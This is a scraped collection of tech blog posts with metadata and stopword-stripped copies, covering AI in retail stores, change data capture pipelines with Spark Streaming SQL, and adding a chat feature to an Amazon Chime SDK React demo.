gleaned from intelligent algorithms. Back in the days (less than 20 years ago), we’d hire students to follow and count customers in specific areas of the store. Thankfully, these times are over. Heat-maps, average route diagrams, time spent on screens, various ratios in relation to total attendance, correlations… the cameras in store and computer vision algorithms now provide actionable tools based on images. Today, heat-mapping and activity recognition solutions help not only to position promotions, but also to create entire marketing strategies, and to measure the performance of each department, as well as that of product placements. Solutions offered by the likes of RetailFlux can analyze store videos to give retailers data on the number of people in their store, the path they take once inside and where they linger. This helps marketers identify popular locations, allowing them to change the layout of furnishings, displays, advertising or staff to better serve their customers and increase revenue. As technologies evolve, we are also starting to hear about “demographic recognition”: these tools, created by start-ups such as DeepVision AI, MyStore-e, RetailDeep and RetailNext, allow us to estimate the age and gender of people passing in front of a camera, thus giving stores access to a whole new granularity of analyzes. This aspect is paramount to the rationalisation now expected of marketers and category managers. Although these cameras are often hung from the ceiling, this is not always the case: Walgreens (in partnership with Cooler Screens), for example, recently integrated cameras, sensors and digital screens in the doors of its stores’ coolers to create a network of “smart” displays that brands can use to target ads to specific types of customers. The doors act as a digital merchandising platform that depicts food and beverages in their best light, but also as an in-store billboard that can show ads to consumers who are approaching, based on variables such as approximate age, gender and current weather. Cameras and sensors inside the connected coolers can also determine which items buyers have picked up or viewed, giving advertisers insight into how their promotions work on the screen, and quickly notifying a retailer if a product is no longer in stock. The key question thus shifts from “where” and “how many” to “who”, “when”, “how often”, “how long” and “for how many cookies?”. 2. Forecasting to increase profits These data, mixed with those from check-outs and loyalty programs, are key to forecasting demand and creating store clusters, which in turn improves retailers’ supply chains. By better predicting what products will do well in a certain area, machine learning algorithms from startups such as Symphony RetailAI can reduce dead stock, help optimise pricing (and profits), and increase customer loyalty (people obviously tend to enjoy finding the right product mix in their nearest store). Indeed, unsold stock might be one of the retail industry’s biggest handicaps: unused inventory costs U.S retailers about $50 billion a year. Reducing this number is key to the industry’s long-term survival : every dollar spent on what becomes dead inventory is valuable money that could have been put towards training talent, better R&D, or, most obviously, brand new smart algorithms. Forecasting also helps retailers optimisise their promotions : the less dead stocks are in the warehouse, the more strategic promotions can be, instead of being merely reactionary. Many pricing aficionados will particularly appreciate this aspect, as it will make their job a lot easier, and a lot less thankless. 3. Personnalisation to promote an in-store experience In the same way that a website can adapt in real time to end users, an increased granularity of computer vision is also possible in stores, allowing it to target individuals. However, these algorithms are based on more elements than the ones presented above, and are thus more complex/less reliable. To work at a personal level, the algorithms need a mix of demographic recognition, loyalty code identification, and augmented reality, often integrated into smart objects such as mirrors. Although they cannot (yet) be implemented on a large scale, these solutions exemplify a profound change in the way stores sell. We are moving from the sale of product to the sale of experiences, where the physical offer becomes a by-product. This is the concept of shoppertainment. Low prices and an extensive catalog are no longer enough for customers, who can find such a value proposition online. An authentic brand experience becomes key to survival : the store is a storehouse of engaging experiences, ideas and interactions. The use cases are of course numerous (even if they often border on the sci-fi technobabble side of the AI equator): during 2019’s NRF, Google presented a connected mirror which links visual recognition data and the stores product database. In the case of an optical store for example, the mirror can recognize the model tested and display product or marketing information concerning it. The sellers also have statistics on the use of the mirror in real time: they know that the person who has tried a certain type of glasses has been there for some time or hesitates between two pairs. This facilitates the work of the seller who can thus advise the customer on the products which really interest them. H&M has for its part allied itself with Microsoft to test a mirror allowing to take selfies thanks to voice commands, while Lululemon’s mirror acts more like a board which encourages its customers to engage with the community created and maintained by the brand. Smart mirrors can of course be placed at different intervals of the purchasing process: Ralph Lauren’s is located in the fitting room to transform the often frustrating experience of trying out clothes. Buyers can interact with the mirror to change the lighting in their fitting room and can select different sizes or colors for their outfits, which an employee will get. The mirror also recommends other items that would go well with what is being tried. Cosmetic companies have also adopted these solutions: the Sephora smart mirror uses an intelligent algorithm which mixes the gender, age, appearance and style of the person looking at it in order to make recommendations. It even claims to differentiate between people wearing neutral or bright colors, daring or conservative styles and clothes with floral and geometric patterns to name a few. Through deep learning, we are also seeing a new technique emerge : affective computing. It is the ability of computers to recognize, interpret, and possibly stimulate emotions. It is indeed possible to identify gestures such as head and body movements, while a voice’s tone can also speak volumes about an individual’s emotional state. These insights can be used in the store so as not to generate an inconvenience for a customer who clearly does not need to be helped or bothered. These technologies are nevertheless new (only Releyeble offers retail use cases) and intrusive: it is therefore preferable not to comment yet on future use cases. 4. Making the shopping experience smoother for the customer Mirrors, augmented reality, virtual reality … they rarely respond to real pain points for retailers and their customers. And we know these pain points by heart : checkout length, quick product localization and inventory management… those should be priorities for stores looking for ways to use machine learning and deep learning solutions. Reducing friction at checkout In China, for example, customers of certain KFCs can, thanks to Alipay technology, make a purchase by placing themselves in front of a POS equipped with cameras, after having linked an image of their face to a digital payment system or bank account. The American chain Caliburger has also tested the idea of ​​facial recognition in some of its restaurants: the first time customers order using in-stores kiosks, they are invited to link their faces to their account using (NEC’s) NeoFace’s facial recognition software in order to benefit from numerous advantages. Payment by bank card is still necessary, but the company intends to switch to payment by facial recognition if the initial test phase is successful. Fears over cybersecurity could however prevent this kind of solution from seeing the light of day on a large scale. Indeed, customers are more and more jealous of their personal data (and rightly so): according to a Wavestone study, only 11% of consumers are ready to submit to facial recognition in stores. For recognition by mobile application, this figure rises to 40%. Other, more viable, ways to use computer vision to make checkout more fluid are therefore being considered. We are by now all familiar with Amazon Go’s automated stores (not too familiar, one hopes), which allow customers with a Prime account to enter the store with a code on their phones, do their shopping, and exit the store without going through a checkout. An algorithm having “followed” the customer around, the amount of purchases is automatically debited, and an invoice is sent by email. Testing of this technology is also underway at Casino, in partnership with XXII. There are many start-ups in this space: Standard Cognition, Zippin, Trigo Vision… all claim to help companies eliminate the checkout of customers. China, meanwhile, is casually reworking the very concept of the store through the Bingo-Box by Auchan. Reducing stock-outs All these cameras can be used to see more than customers: many solutions for monitoring shelves have indeed emerged. They offer to send an alert to employees in the event of a shortage, which allows for a prompt response. This is key for stores: stockouts represent more than $129 billion in lost sales in North America each year (~4% of revenues). Not only that, but stock-outs can also actively drive customers into the arms of competition: 24% of Amazon’s revenue comes from customers who have experienced a stock-out at a local retailer. There are many examples of such solutions: in France, Angus AI works with Les Mousquetaires. In the US, Walmart has been working on this concept since last year, as has ABInbev with Focal Systems. Interestingly, Yoobic’s solution offers a similar process, but the camera is in the hands of individuals in order to take the photos that will be analyzed by the algorithms. In China, meanwhile, Hema (Alibaba’s store of the future) is pushing the border of augmented stores more than anywhere else in the world. Shopping advices through Voice technology Of course, images aren’t the only things that can be analyzed in store; voice also has a role to play in streamlining customer journeys. This under-appreciated method of shopping is due for a small revolution: 13% of all households in the United States owned a smart speaker in 2017, per OC&C Strategy Consultants. That number is predicted to rise to 55% by 2022. The fact that Amazon is also a leader in voice technologies shows how serious the Seattle giant is in terms of its brick-and-mortar domination (having already conquered virtual spaces). The brand’s Echo Buds, launched in 2019 work with Alexa to answer any questions it understands while a customer is on the move. More interestingly for retail, it also informs the user if the closest Whole Foods (Amazon owns Whole Foods) has an item a customer is looking for. Once they are informed and in the store, the Echo Buds can direct them to the right aisle. You can imagine Alexa not only guiding you to an item, but if you tell it that you want to make lasagna, it could also guide you through a store, giving you the quickest way to pick up all the necessary ingredients. The future is ear (get it?). Virtual assistants are indeed on the rise. The Mars Agency, for example, has partnered with American retailer BevMo! to test SmartAisle, a digital whiskey purchase assistant. By mixing artificial intelligence, voice-activated technology and LED lights on the shelves, SmartAisle helps buyers choose the perfect whiskey bottle. Three bottles are recommended after a quick conversation, and the relevant shelves light up to lead the customer to the preferred bottles. If customers already have a brand in mind, the assistant can recommend other brands or bottles with similar flavor profiles. The whole experience lasts no more than 2 minutes. The voice assistant makes it a pleasant and informative experience, with a mix of banter and useful information. From NLP to virtual assistants, the two examples above show that, if used well, Voice technology can free more employee time, and give key data to retailers. Robotic automation The discussion on improving and streamlining processes would not be complete without a discussion around robotics. These objects, long relegated to science fiction, are now showing their usefulness in stores around the world. Although robotics is not in itself a subcategory of artificial intelligence, robots roaming the aisles use notions of computer vision and NLP. Just like Amazon, Walmart is here too at the cutting edge of technology: Bossa Nova robots (called “Auto-S”), which are designed to scan items on the shelves to help with price accuracy and restocking, are already present in 1000 of their stores. These six feet tall devices contain 15 cameras each, which scan shelves and send alerts to employees in real time. This frees workers from the need to focus on repeatable, predictable and manual tasks, giving them time to focus more on sales and customer service. Walmart has also introduced robots that clean floors, unload and sort items from trucks and pick up orders in stores. It is interesting to note that this niche is quickly becoming highly competitive, Simbe’s robots have been deployed in Schnuck store across America, with the same value proposition as Bossa Nova, while Lowe’s unveiled in 2016 a robot that can understand and respond to simple customer questions. Post-coronavirus, it is almost certain that the movement towards robotics will accelerate in the coming months. 5. Loss prevention “Shrinkage” (theft) has an enormous cost: €49 billion per year on a European scale (2.1% of annual turnover in the distribution sector), weighing heavy on the margins of distributors already highly pressurized by price wars. Security therefore becomes a pressing need. And because of costs, so does automation. This can take many forms. Augmented cameras, for example, can identify if a product has been hidden, and alert a human. This would, however, produce a lot of false positives due to the physical impossibility of an all-knowing camera. Companies such as Vaak or DeepCam AI claim to be able to avoid this problem by alerting someone only if the behavior of a visitor is highly suspicious. Solutions such as StopLift also offer to detect “sweethearting” (an employee pretending to make a transaction, but in fact giving a product to an acquaintance without payment). It is important to remember that a large percentage of store thefts go through employees. The ROI of these solutions is easy to calculate: stores know exactly how much they lose from theft and errors. As such, this use case is likely to be one of the first to be implemented. Conclusion In view of all these developments, and despite their many positives for both retailers and customers, it is essential that customers question retailers about who has access to data and how it is used. It goes without saying that transparency must be the watchword of any use of personal data in order to guarantee consumers the preservation of their private life. If you’re eager to get going with your very own corporate A.I project, I recommend jumping straight to my latest article on the matter : 10 Steps to your very own Corporate Artificial Intelligence project.
https://towardsdatascience.com/complete-guide-to-machine-learning-and-deep-learning-in-retail-ca4e05639806
['Adrien Book']
2020-05-15 16:41:57.390000+00:00
['Retail Technology', 'AI', 'Retail', 'Artificial Intelligence', 'Deep Learning']
Title Complete guide machine learning deep learning retailContent Complete guide machine learning deep learning retail store aren’t dead yet Stores changing see happening eye even don’t always realize Little little becoming one extra step increasingly complex customer journey Thanks digitalisation retail automation store longer end mean serving need brand large quality experience feeling belonging recognition comfort purchase… parameter matter much sale per square meter must therefore submit optimization prescribed Data Science “intelligent algorithms” aka artificial Intelligence form machine learning deep learning use artificial intelligence competitive necessity Indeed ecommerce player wait anyone note example adaptation online search result end customer recommendation made based digital profile two aspect impossible brick mortar However physical commerce strength Olfactory visual auditory etc data used give consumer feeling experienced something unique made specifically addition customer relationship improvement artificial intelligence also make possible seek resolution problem long represented burden retailer better inventory management optimization store space optimization employee time… present complete look deep learning machine learning use case implemented create store future supported reallife example 1 Adapting store inventory better serve customer It’s known fact ecommerce actor optimize website real time using dynamic statistic allows define effective strategy according resource available predefined customer segmentation Like physical space store luxury However prevent periodic optimization physical space thanks insight gleaned intelligent algorithm Back day le 20 year ago we’d hire student follow count customer specific area store Thankfully time Heatmaps average route diagram time spent screen various ratio relation total attendance correlations… camera store computer vision algorithm provide actionable tool based image Today heatmapping activity recognition solution help position promotion also create entire marketing strategy measure performance department well product placement Solutions offered like RetailFlux analyze store video give retailer data number people store path take inside linger help marketer identify popular location allowing change layout furnishing display advertising staff better serve customer increase revenue technology evolve also starting hear “demographic recognition” tool created startup DeepVision AI MyStoree RetailDeep RetailNext allow u estimate age gender people passing front camera thus giving store access whole new granularity analyzes aspect paramount rationalisation expected marketer category manager Although camera often hung ceiling always case Walgreens partnership Cooler Screens example recently integrated camera sensor digital screen door stores’ cooler create network “smart” display brand use target ad specific type customer door act digital merchandising platform depicts food beverage best light also instore billboard show ad consumer approaching based variable approximate age gender current weather Cameras sensor inside connected cooler also determine item buyer picked viewed giving advertiser insight promotion work screen quickly notifying retailer product longer stock key question thus shift “where” “how many” “who” “when” “how often” “how long” “for many cookies” 2 Forecasting increase profit data mixed checkout loyalty program key forecasting demand creating store cluster turn improves retailers’ supply chain better predicting product well certain area machine learning algorithm startup Symphony RetailAI reduce dead stock help optimise pricing profit increase customer loyalty people obviously tend enjoy finding right product mix nearest store Indeed unsold stock might one retail industry’s biggest handicap unused inventory cost US retailer 50 billion year Reducing number key industry’s longterm survival every dollar spent becomes dead inventory valuable money could put towards training talent better RD obviously brand new smart algorithm Forecasting also help retailer optimisise promotion le dead stock warehouse strategic promotion instead merely reactionary Many pricing aficionado particularly appreciate aspect make job lot easier lot le thankless 3 Personnalisation promote instore experience way website adapt real time end user increased granularity computer vision also possible store allowing target individual However algorithm based element one presented thus complexless reliable work personal level algorithm need mix demographic recognition loyalty code identification augmented reality often integrated smart object mirror Although cannot yet implemented large scale solution exemplify profound change way store sell moving sale product sale experience physical offer becomes byproduct concept shoppertainment Low price extensive catalog longer enough customer find value proposition online authentic brand experience becomes key survival store storehouse engaging experience idea interaction use case course numerous even often border scifi technobabble side AI equator 2019’s NRF Google presented connected mirror link visual recognition data store product database case optical store example mirror recognize model tested display product marketing information concerning seller also statistic use mirror real time know person tried certain type glass time hesitates two pair facilitates work seller thus advise customer product really interest HM part allied Microsoft test mirror allowing take selfies thanks voice command Lululemon’s mirror act like board encourages customer engage community created maintained brand Smart mirror course placed different interval purchasing process Ralph Lauren’s located fitting room transform often frustrating experience trying clothes Buyers interact mirror change lighting fitting room select different size color outfit employee get mirror also recommends item would go well tried Cosmetic company also adopted solution Sephora smart mirror us intelligent algorithm mix gender age appearance style person looking order make recommendation even claim differentiate people wearing neutral bright color daring conservative style clothes floral geometric pattern name deep learning also seeing new technique emerge affective computing ability computer recognize interpret possibly stimulate emotion indeed possible identify gesture head body movement voice’s tone also speak volume individual’s emotional state insight used store generate inconvenience customer clearly need helped bothered technology nevertheless new Releyeble offer retail use case intrusive therefore preferable comment yet future use case 4 Making shopping experience smoother customer Mirrors augmented reality virtual reality … rarely respond real pain point retailer customer know pain point heart checkout length quick product localization inventory management… priority store looking way use machine learning deep learning solution Reducing friction checkout China example customer certain KFCs thanks Alipay technology make purchase placing front POS equipped camera linked image face digital payment system bank account American chain Caliburger also tested idea ​​facial recognition restaurant first time customer order using instores kiosk invited link face account using NEC’s NeoFace’s facial recognition software order benefit numerous advantage Payment bank card still necessary company intends switch payment facial recognition initial test phase successful Fears cybersecurity could however prevent kind solution seeing light day large scale Indeed customer jealous personal data rightly according Wavestone study 11 consumer ready submit facial recognition store recognition mobile application figure rise 40 viable way use computer vision make checkout fluid therefore considered familiar Amazon Go’s automated store familiar one hope allow customer Prime account enter store code phone shopping exit store without going checkout algorithm “followed” customer around amount purchase automatically debited invoice sent email Testing technology also underway Casino partnership XXII many startup space Standard Cognition Zippin Trigo Vision… claim help company eliminate checkout customer China meanwhile casually reworking concept store BingoBox Auchan Reducing stockouts camera used see customer many solution monitoring shelf indeed emerged offer send alert employee event shortage allows prompt response key store stockouts represent 129 billion lost sale North America year 4 revenue stockouts also actively drive customer arm competition 24 Amazon’s revenue come customer experienced stockout local retailer many example solution France Angus AI work Les Mousquetaires US Walmart working concept since last year ABInbev Focal Systems Interestingly Yoobic’s solution offer similar process camera hand individual order take photo analyzed algorithm China meanwhile Hema Alibaba’s store future pushing border augmented store anywhere else world Shopping advice Voice technology course image aren’t thing analyzed store voice also role play streamlining customer journey underappreciated method shopping due small revolution 13 household United States owned smart speaker 2017 per OCC Strategy Consultants number predicted rise 55 2022 fact Amazon also leader voice technology show serious Seattle giant term brickandmortar domination already conquered virtual space brand’s Echo Buds launched 2019 work Alexa answer question understands customer move interestingly retail also informs user closest Whole Foods Amazon owns Whole Foods item customer looking informed store Echo Buds direct right aisle imagine Alexa guiding item tell want make lasagna could also guide store giving quickest way pick necessary ingredient future ear get Virtual assistant indeed rise Mars Agency example partnered American retailer BevMo test SmartAisle digital whiskey purchase assistant mixing artificial intelligence voiceactivated technology LED light shelf SmartAisle help buyer choose perfect whiskey bottle Three bottle recommended quick conversation relevant shelf light lead customer preferred bottle customer already brand mind assistant recommend brand bottle similar flavor profile whole experience last 2 minute voice assistant make pleasant informative experience mix banter useful information NLP virtual assistant two example show used well Voice technology free employee time give key data retailer Robotic automation discussion improving streamlining process would complete without discussion around robotics object long relegated science fiction showing usefulness store around world Although robotics subcategory artificial intelligence robot roaming aisle use notion computer vision NLP like Amazon Walmart cutting edge technology Bossa Nova robot called “AutoS” designed scan item shelf help price accuracy restocking already present 1000 store six foot tall device contain 15 camera scan shelf send alert employee real time free worker need focus repeatable predictable manual task giving time focus sale customer service Walmart also introduced robot clean floor unload sort item truck pick order store interesting note niche quickly becoming highly competitive Simbe’s robot deployed Schnuck store across America value proposition Bossa Nova Lowe’s unveiled 2016 robot understand respond simple customer question Postcoronavirus almost certain movement towards robotics accelerate coming month 5 Loss prevention “Shrinkage” theft enormous cost €49 billion per year European scale 21 annual turnover distribution sector weighing heavy margin distributor already highly pressurized price war Security therefore becomes pressing need cost automation take many form Augmented camera example identify product hidden alert human would however produce lot false positive due physical impossibility allknowing camera Companies Vaak DeepCam AI claim able avoid problem alerting someone behavior visitor highly suspicious Solutions StopLift also offer detect “sweethearting” employee pretending make transaction fact giving product acquaintance without payment important remember large percentage store theft go employee ROI solution easy calculate store know exactly much lose theft error use case likely one first implemented Conclusion view development despite many positive retailer customer essential customer question retailer access data used go without saying transparency must watchword use personal data order guarantee consumer preservation private life you’re eager get going corporate AI project recommend jumping straight latest article matter 10 Steps Corporate Artificial Intelligence projectTags Retail Technology AI Retail Artificial Intelligence Deep Learning
3,888
Orchestrating change data capture to a data lake
Orchestrating change data capture to a data lake Building change data capture(CDC) with Spark Streaming SQL What is change data capture? If you are a data engineer, CDC will not appear foreign to you. It is an approach to data integration that is based on the checking, capture and delivery of the change to the data source interface. CDC can help loading the source table into your data lake. There is huge amount of data stored in the database or application source and the data team would want to analyze this table. Running queries against the live production database could result in degradation of performance for the external application. The CDC process/pipeline is used to load the table to the external data lake. The apps that need access can use ETL or ad-hoc on the target table stored in the data lake for analysis. Possible architectural considerations There are a lot of CDC solutions, including incremental scheduled import jobs or real time jobs. Sqoop is an open source tool that could be used to transport data between Hadoop and relational database. The team can build daily jobs which could be used to load the data into the data lake. This could still create a huge load on the database and affect performance. Hence, the schedule needs to be worked out to make sure application performance is not affected. This scenario could severely limit real time queries and analysis on top of limitations that Sqoop additionally has. The problem with the previous architecture is the load and bottleneck it creates on the application database. To solve for those issues we can use binlog. The binlog is a set of sequence log files that could then record or insert, update, delete operations. For this streaming CDC pipeline using binlog, first, we can use some out source to us, like JSON or Maxwell to sync binlog to Kafka or some other comparable service. Then the apps downstream can leverage Spark streaming to consume the topic from Kafka sequencing. Sequencing parses up binlog record into the targeted storage system. We could support Insert, Update, Delete, like Kudu or data or HBase. This solution comes with a set of operational challenges if the data is too large especially with Kudu. Based on our previous architectural consideration, binlog will limit load on application database but it will result in a few other challenges. We can solve for those operational challenges and issues using Spark Streaming SQL. We could build a CDC process/pipeline using Spark Streaming SQL. We can drive Streaming SQL to parse the binlog and merge them into a data lake. Orchestration for Spark Streaming SQL SQL is a declarative language. Almost all of the data engineers have SQL skills especially in database and data warehouse like MySQL, HIVESQL or SparkSQL. The advantage of using Stream SQL, even if the developers are not familiar with Spark Streaming or Java or Scala, they can still easily develop streaming processing. Additionally, it is also low cost if you want to migrate from best SQL job to a Streaming SQL job. As a part of this orchestration, we should have sync the binlog of the table to Kafka using Debezium or other similar products. Binlog is a different format hence, the binlog parser will also be different from a normal parser. We can use Spark Streaming SQL to consume the binlog from Kafka, and parse the binlog using the operation type of this record, like insert, update or delete, then we can merge this past record data to the data lake. Internally, Spark Streaming receives live input data streams and divides the data into batches, which are then processed by the Spark engine to generate the final stream of results in batches. Step one, we should create two tables, one source which is the Kafka table, and another is target data table. Step two, we create a streaming scan on top of the Kafka table and set some parameters in options clause, like studying offsets, max offset per trigger. Step three would house the major logic of the CDC pipeline. We create a screen to wrap the merge into statements and the job parameters. Step four, we can use Streaming SQL command to launch the SQL file. This command will launch a client mode streaming job. Once that is set and the job runs, we can view the CDC streaming pipeline. At this point, we can check that we can query the data table in the outer link, if there are some data changes in the source database table and they should match. For each batch of the streaming, we call the data’s merge function to merge the parse binlog record into the target data table. That should finish the orchestration. Post this setup, we will need to setup monitoring and metrics on each step of this process. These metrics should provide us with values to visualize bottlenecks and the flow of data. In addition, we need to setup alerts on the operational metrics. These would allow the team to consume and respond to alerts respectively. Conclusion The process above should be able to provide a way to setup a basic CDC pipeline which can handle billions of CDC events relatively well. We can also do the update, delete of mode of ratio on the data table. On top of the solution the team could support schema enforcement and evolution which can provide better data quality and data management. Time travel provides snapshots of data, then we can query any earlier worsening of the data. Only Spark can write data through data, including batch mode and streaming mode, and leverage Presto on how spark can query data from data.
https://medium.com/acing-ai/orchestrating-change-data-capture-to-a-data-lake-283048656d98
['Vimarsh Karbhari']
2020-09-10 14:45:42.720000+00:00
['Machine Learning', 'Data Science', 'Artificial Intelligence', 'Data Engineering', 'Spark']
Title Orchestrating change data capture data lakeContent Orchestrating change data capture data lake Building change data captureCDC Spark Streaming SQL change data capture data engineer CDC appear foreign approach data integration based checking capture delivery change data source interface CDC help loading source table data lake huge amount data stored database application source data team would want analyze table Running query live production database could result degradation performance external application CDC processpipeline used load table external data lake apps need access use ETL adhoc target table stored data lake analysis Possible architectural consideration lot CDC solution including incremental scheduled import job real time job Sqoop open source tool could used transport data Hadoop relational database team build daily job could used load data data lake could still create huge load database affect performance Hence schedule need worked make sure application performance affected scenario could severely limit real time query analysis top limitation Sqoop additionally problem previous architecture load bottleneck creates application database solve issue use binlog binlog set sequence log file could record insert update delete operation streaming CDC pipeline using binlog first use source u like JSON Maxwell sync binlog Kafka comparable service apps downstream leverage Spark streaming consume topic Kafka sequencing Sequencing par binlog record targeted storage system could support Insert Update Delete like Kudu data HBase solution come set operational challenge data large especially Kudu Based previous architectural consideration binlog limit load application database result challenge solve operational challenge issue using Spark Streaming SQL could build CDC processpipeline using Spark Streaming SQL drive Streaming SQL parse binlog merge data lake Orchestration Spark Streaming SQL SQL declarative language Almost data engineer SQL skill especially database data warehouse like MySQL HIVESQL SparkSQL advantage using Stream SQL even developer familiar Spark Streaming Java Scala still easily develop streaming processing Additionally also low cost want migrate best SQL job Streaming SQL job part orchestration sync binlog table Kafka using Debezium similar product Binlog different format hence binlog parser also different normal parser use Spark Streaming SQL consume binlog Kafka parse binlog using operation type record like insert update delete merge past record data data lake Internally Spark Streaming receives live input data stream divide data batch processed Spark engine generate final stream result batch Step one create two table one source Kafka table another target data table Step two create streaming scan top Kafka table set parameter option clause like studying offset max offset per trigger Step three would house major logic CDC pipeline create screen wrap merge statement job parameter Step four use Streaming SQL command launch SQL file command launch client mode streaming job set job run view CDC streaming pipeline point check query data table outer link data change source database table match batch streaming call data’s merge function merge parse binlog record target data table finish orchestration Post setup need setup monitoring metric step process metric provide u value visualize bottleneck flow data addition need setup alert operational metric would allow team consume respond alert respectively Conclusion process able provide way setup basic CDC pipeline handle billion CDC event relatively well also update delete mode ratio data table top solution team could support schema enforcement evolution provide better data quality data management Time travel provides snapshot data query earlier worsening data Spark write data data including batch mode streaming mode leverage Presto spark query data dataTags Machine Learning Data Science Artificial Intelligence Data Engineering Spark
3,889
Add Chat Feature to Demo of Amazon Chime SDK React Component Library
Add Chat Feature to Demo of Amazon Chime SDK React Component Library dannadori Follow Nov 30 · 7 min read Note: This article is also available here.(Japanese) https://cloud.flect.co.jp/entry/2020/11/30/125920 In our last article, we posted a brief introduction to the Amazon Chime SDK React Component Library. At the time of writing, the latest update of this library, ver 1.5.0, added Chat-related components. I’m going to use it to add Chat functionality to an official AWS demo. Like this. Note: that this article is a bit complicated, using React coding. If you simply want to run the code, the URL of the repository is given at the end of this article, so you can get the code from there and run it. At First This time, we will add Chat functionality based on the demo provided by the official. First, make sure you have a working sample of ver 1.5.0, referring to the previous article. Approach Generally, the Amazon Chime SDK React Component Library provides React components as well as hooks and providers (Context APIs) that work behind the components to make it easier to use Amazon Chime’s features. With the addition of the Chat-related components, I was hoping that they would provide providers or hooks to enable Chat functionality, but unfortunately, they haven’t yet. This issue says that you should implement it yourself with data messages for real-time signaling. Please refer to my previous article on data messages for real-time signaling. So, I would like to implement a provider that uses data messages for real-time signaling by myself. RealitimeSubscribeChatStateProvider We will name the provider we will create as RealtimeSubscribeChatStateProvider. The following is a brief description of the content of the provider, in excerpts that we think are important. The entire source code can be found here. Call userealitimeSubscribeChatState() of this provider so that you can refer to the Chat features and data. Definition of State Define the State (Chat function and data) provided by userealitimeSubscribeChatState(). If you just want to create a simple Chat function, the following two variables should be sufficient. export interface RealitimeSubscribeChatStateValue { chatData: RealtimeData[] sendChatData: (mess: string) => void } The RealtimeData used in the interface is the actual data to be sent and received. In this article, we have defined the following data structure. export type RealtimeData = { uuid: string data: any createdDate: number senderName: string //<snip> } useRealitimeSubscribeChatState() The method to provide the above State is as follows: when creating a provider using the Context API, I think it’s almost formulaic, so I won’t describe it. export const useRealitimeSubscribeChatState = (): RealitimeSubscribeChatStateValue => { const state = useContext(RealitimeSubscribeChatStateContext) if (!state) { // handle exception } return state } Definition of Provider Sending and receiving data messages for real-time signaling is done by AudioVideoFacade. You can get a reference to this AudioVideoFacade with useAudioVideo() (1–1), and you can get the username with useAppState() (1–2). The user name can be retrieved with useAppState() (1–2). The Chat text data is managed by this provider using useState. (1–3) In (2–1), we define a data transmission function using data messages for real-time signaling. We call the method of audioVideo (AudioVideoFacade) to send the data. In this time, we specify “CHAT” because we can specify the topic (2–2). Also, since the sender can’t receive the sent data , you should add the sent data to the Chat text data after sending(2–3). useEffect registers (and deletes) a function for receiving data messages for real-time signaling (3–1), (3–2). The receive function itself just parses the received data and adds it to the text data of Chat, as shown in (3–3). export const RealitimeSubscribeChatStateProvider = ({ children }: Props) => { const audioVideo = useAudioVideo() // <----- (1-1) const { localUserName } = useAppState() // <----- (1-2) const [chatData, setChatData] = useState([] as RealtimeData[]) // <----- (1-3) const sendChatData = (text: string) => { // <----- (2-1) const mess: RealtimeData = { uuid: v4(), data: text, createdDate: new Date().getTime(), senderName: localUserName } audioVideo!.realtimeSendDataMessage("CHAT" as DataMessageType, JSON.stringify(mess)) // <----- (2-2) setChatData([...chatData, mess]) // <----- (2-3) } const receiveChatData = (mess: DataMessage) => { // <----- (3-3) const data = JSON.parse(mess.text()) as RealtimeData setChatData([...chatData, data]) } useEffect(() => { audioVideo!.realtimeSubscribeToReceiveDataMessage( // <----- (3-1) "CHAT" as DataMessageType, receiveChatData ) return () => { audioVideo!.realtimeUnsubscribeFromReceiveDataMessage("CHAT" as DataMessageType) // <----- (3-2) } }) const providerValue = { chatData, sendChatData, } return ( <RealitimeSubscribeChatStateContext.Provider value={providerValue}> {children} </RealitimeSubscribeChatStateContext.Provider> ) } GUI Next, I’m going to go over the part that displays the Chat screen. Here is another excerpt of what we think is important. Adding RealitimeSubscribeStateProvider Modify the DOM of MeetingView to allow the above created providers to be used in the conference room. Add a real-timeSubscribeStateProvider to the (1) part. This will allow the Chat feature to be used in the subordinate Views. const MeetingView = () => { useMeetingEndRedirect(); const { showNavbar, showRoster, showChat } = useNavigation(); return ( <UserActivityProvider> <StyledLayout showNav={showNavbar} showRoster={showRoster || showChat}> <RealitimeSubscribeStateProvider> // <--- (1) <StyledContent> <MeetingMetrics /> <VideoTileGrid className="videos" noRemoteVideoView={<MeetingDetails />} /> <MeetingControls /> </StyledContent> <NavigationControl /> </RealitimeSubscribeStateProvider> </StyledLayout> </UserActivityProvider> ); }; ChatView In (1), we get the chat data and a reference to the data sending function using the userealitimeSubscribeChatState() we created earlier. In (2–1) and (2–2), we use the Chat component of the Amazon Chime SDK React Component Library to generate the display part (more on this later). (3) calls the send function of the chat data. const ChatView = () => { const { localUserName } = useAppState() const { closeChat } = useNavigation(); const { chatData, sendChatData } = useRealitimeSubscribeChatState() // <---- (1) const [ chatMessage, setChatMessage] = useState(''); const attendeeItems = [] for (let c of chatData) { // <---- (2-1) const senderName = c.senderName const text = c.data const time = (new Date(c.createdDate)).toLocaleTimeString('ja-JP') attendeeItems.push( <ChatBubbleContainer timestamp={time} key={time+senderName}> // <---- (2-2) <ChatBubble variant= {localUserName === senderName ? "outgoing" : "incoming"} senderName={senderName} content={text} showTail={true} css={bubbleStyles} /> </ChatBubbleContainer> ) } return ( <Roster className="roster"> <RosterHeader title="Chat" onClose={()=>{closeChat}}> </RosterHeader> {attendeeItems} <br/> <Textarea //@ts-ignore onChange={e => setChatMessage(e.target.value)} value={chatMessage} placeholder="input your message" type="text" label="" style={{resize:"vertical",}} /> <PrimaryButton label="send" onClick={e=>{ setChatMessage("") sendChatData(chatMessage) // <---- (3) }} /> </Roster> ); } The rest you have to do is enable this ChatView to be displayed from a navibar. The display from the navibar is not essential in this case, and it contains several minor modifications, so I will not describe it. Please check the changes from the repository’s commit log. Run Now, let’s see how it works. If you type a message like this, you’ll see a message on your screen with the other person. For your own message (which has an outgoing variant attribute), it will be a blue speech bubble. For other messages, it will be a white speech bubble. You can toggle the display of the balloon’s tail (which, in cartoon terms, indicates where the balloon originates) by using the tail attribute, but you can’t change its direction. Otherwise, you can omit the time or add action buttons. Repository You can find the source code for this one in the “chat_feature” branch of the following repository You can launch it in the same way as the way we ran the demo in the previous article, so check out how it works. Finally This is a look at adding chat functionality to the official Amazon Chime SDK React Component Library demo. Although I had to touch the raw Amazon Chime SDK a bit, I was able to create a chat GUI that was consistent with the other components without too much effort. In addition to the chat function introduced here, the following repositories provide a version with a whiteboard function. Also, Cognito integration and virtual backgrounds are implemented in the following repositories. Virtual Background Whiteboard
https://medium.com/swlh/add-chat-feature-to-demo-of-amazon-chime-sdk-react-component-library-9379f6e43e58
[]
2020-12-13 06:48:39.032000+00:00
['JavaScript', 'React', 'AWS', 'Videoconference']
